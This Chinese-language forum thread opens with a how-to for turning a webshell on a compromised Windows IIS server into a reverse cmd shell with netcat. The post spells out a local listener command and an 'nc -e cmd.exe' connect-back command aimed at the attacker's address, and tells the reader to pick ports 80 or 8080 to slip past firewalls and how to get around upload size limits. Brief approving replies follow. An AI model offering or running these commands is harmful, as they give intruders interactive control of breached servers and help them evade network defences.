查看: 1849|回复: 25

webshell下使用NC反弹cmdshell

[复制链接]
发表于 2013-1-21 11:17:29 | 显示全部楼层 |阅读模式

前提:

1.能用WebShell运行cmd命令。
方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。
2.上传nc。可以跟cmd.exe上传到同一目录。
步骤:
1、本地监听一个端口。
nc -vv -l -p 8080
最好是80或8080这样的端口,被防火墙拦截的几率小很多。


2、在WebShell运行下面命令连接我们监听的端口得到CmdShell:
nc -vv 步骤1监听的地址 8080 -e 上传的cmd.exe


上传cmd.exe的时候,如果服务器限制了上传文件小于200k(windows 2003 iis默认就这样),可以使用附件中小于200k的cmd。
反弹成功后,本地监听的命令窗口命令行窗口提示变为C:\WINDOWS\system32\inetsrv>



通过webshell反弹的cmd继承IIS的权限,一般权限较低。但是还是很方便执行系统命令的。


发表于 2013-2-1 13:25:22 | 显示全部楼层
不错,看看。  
发表于 2014-10-20 03:08:40 | 显示全部楼层
好帖,有才  
发表于 2014-10-26 22:42:15 | 显示全部楼层
支持你加分  
发表于 2014-11-6 08:59:57 | 显示全部楼层
我顶啊。接着顶  
发表于 2014-11-18 19:28:57 | 显示全部楼层
一个有信念者所开发出的力量,大于99个只有兴趣者。  
发表于 2014-12-6 14:41:06 | 显示全部楼层
不错!  
发表于 2014-12-29 18:25:14 | 显示全部楼层
呵呵,支持一下哈  
发表于 2015-1-29 15:28:16 | 显示全部楼层
一个个全都骑到老大头上来了...  
发表于 2015-3-3 19:10:18 | 显示全部楼层
满城尽待年终奖,弄弄才是喇叭腔  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则